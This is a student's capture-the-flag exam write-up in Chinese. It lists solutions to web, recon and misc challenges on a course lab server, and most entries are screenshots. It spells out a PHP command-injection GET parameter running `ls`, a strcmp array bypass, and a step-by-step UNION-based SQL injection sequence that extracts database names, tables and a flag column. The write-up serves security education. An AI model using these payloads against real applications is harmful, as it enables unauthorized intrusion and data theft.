【期末】上機 write-up

> # 【期末】上機 write-up ## `Web` * ### HW-eval > ![](https://i.imgur.com/mAv8Waz.png) > * 由程式碼觀察，strpos函式結果為變數中第一次出現" 或 '的位置 die 會停止整個頁面的程式，並輸出函數中的字串或函數 > * 因此第一個字元輸入"讓strpos=0，再使用 . 來相接字串，利用ls指令GET參數如下 > * 可以觀察目錄底下有ffff11111113g.php及index.php兩個檔案 > http://140.134.25.138:24004/?cat=".`ls .` . " > ![](https://i.imgur.com/asFfRV8.png) * ### HW-extract > ![](https://i.imgur.com/XKMmL5X.png) > ![](https://i.imgur.com/ESVuuRS.png) > * 一開始這樣做結果失敗 > ![](https://i.imgur.com/tLkRz04.png) > * 然後到其它網站encrypt > ![](https://i.imgur.com/iArU4nl.png) > * 結果錯，才發現原來最後需要自己配encrypt前與後的pair > * 所以自己隨便打個password來encrypt結果成功了 > ![](https://i.imgur.com/1EXLOb1.png) > ![](https://i.imgur.com/qY9CBWq.png) > * http://140.134.25.138:24010/index.php?password=a&pass=86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 ![](https://i.imgur.com/8R9r5c9.png) ![](https://i.imgur.com/dQDJa4E.png) * ### HW-Bypass II > ![](https://i.imgur.com/z8ovTkb.png) > ![](https://i.imgur.com/rZ52Fx8.png) * ### 這題真的很簡單 > ![](https://i.imgur.com/fqmnOce.png) * ### Fake IP++ > ![](https://i.imgur.com/BG1TIpu.png) > * 換ip 和 host 到 127.0.0.1，使用了chrome extension改 > ![](https://i.imgur.com/iw1qIMU.png) > ![](https://i.imgur.com/Ev85O7w.png) * ### 伍佰 > ![](https://i.imgur.com/3X9HE6X.png) > ![](https://i.imgur.com/4I5NJfb.png) > ![](https://i.imgur.com/w1GRB0I.png) * ### Give me more MAGIC > ![](https://i.imgur.com/zdowbvK.png) > ![](https://i.imgur.com/o4S2AwL.png) > * https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016 > * http://140.134.25.138:24009/index.php?password[]=%22%22 * ### Version v5 > ![](https://i.imgur.com/GD5Al56.png) > * gitleak 套件，找到ctf flag * ### HW-UnionBase > ![](https://i.imgur.com/IYofZbD.png) > * 先找出database > * ' union select 'a','a', schema_name FROM information_schema.schemata;# > ![](https://i.imgur.com/oRerUuh.png) > * 再找出table > * ' union select 'a','a', table_name from information_schema.tables where table_schema = 'ctf'; > ![](https://i.imgur.com/FQMmKYE.png) > * 再找出column > * ' union select 'a','a', column_name FROM information_schema.columns WHERE table_name = 'ctfffff'; > ![](https://i.imgur.com/2A1LWou.png) > * 再找出flag > * ' union select 'a','a', flagggggggggggg from ctfffff ; > ![](https://i.imgur.com/xt1iuYQ.png) * ### eval++ > ![](https://i.imgur.com/qeUqSVM.png) > ![](https://i.imgur.com/Q8q9mYy.png) > ![](https://i.imgur.com/7gKUysy.png) * ### 3C 達人 T1m 戈 ++ > * ip injection > ![](https://i.imgur.com/20EdN4n.png) > ![](https://i.imgur.com/eDEbXtN.png) > ![](https://i.imgur.com/XV1DGhv.png) > ![](https://i.imgur.com/HP8qWa5.png) * ### MAGIC > ![](https://i.imgur.com/QBIldzW.png) * ### 3C 達人 T1m 戈 > ![](https://i.imgur.com/20EdN4n.png) > ![](https://i.imgur.com/eDEbXtN.png) > ![](https://i.imgur.com/XV1DGhv.png) > ![](https://i.imgur.com/HP8qWa5.png) * ### SESSION > ![](https://i.imgur.com/m5l54kX.png) * ### Simple Login > ![](https://i.imgur.com/D9xe9da.png) > ![](https://i.imgur.com/J9yaSVM.png) * ### 五卍 > ![](https://i.imgur.com/XFUsoaX.png) > ![](https://i.imgur.com/1DLx48k.png) ## `Recon` * ### Blasting > ![](https://i.imgur.com/80Uww9B.png) > ![](https://i.imgur.com/LnOrTgE.png) > ![](https://i.imgur.com/E8rlfWO.png) > ![](https://i.imgur.com/FAPAJVT.png) * ### 這題真的很好玩！ > ![](https://i.imgur.com/vCcZHQ0.png) > ![](https://i.imgur.com/yzH8CUT.png) * ### HTTP / HTTPS > ![](https://i.imgur.com/511VcBs.png) > * 在https://crt.sh/ 找subdomain %.tabby.tw > ![](https://i.imgur.com/xEDVpQU.png) > * https://iegwxztmmrtleqonqgzc.tabby.tw/ > ![](https://i.imgur.com/gcvLjvz.png) ## `Misc` * ### Welcome! > * 送分 * ### meme Cat > ![](https://i.imgur.com/pYlpDiC.png) * ### Info In S0mething > ![](https://i.imgur.com/Z993BvG.png) > * QRcode就是flag * ### Be ADMIN > * 看到是ruby檔，有嘗試使用netcat，輸入什麼都無效。有看到stdin，有可能可以在輸入做一些操作，進入shell並讀取程式碼。 > ![](https://i.imgur.com/8o2JpDh.png) > ![](https://i.imgur.com/XikFA2u.png)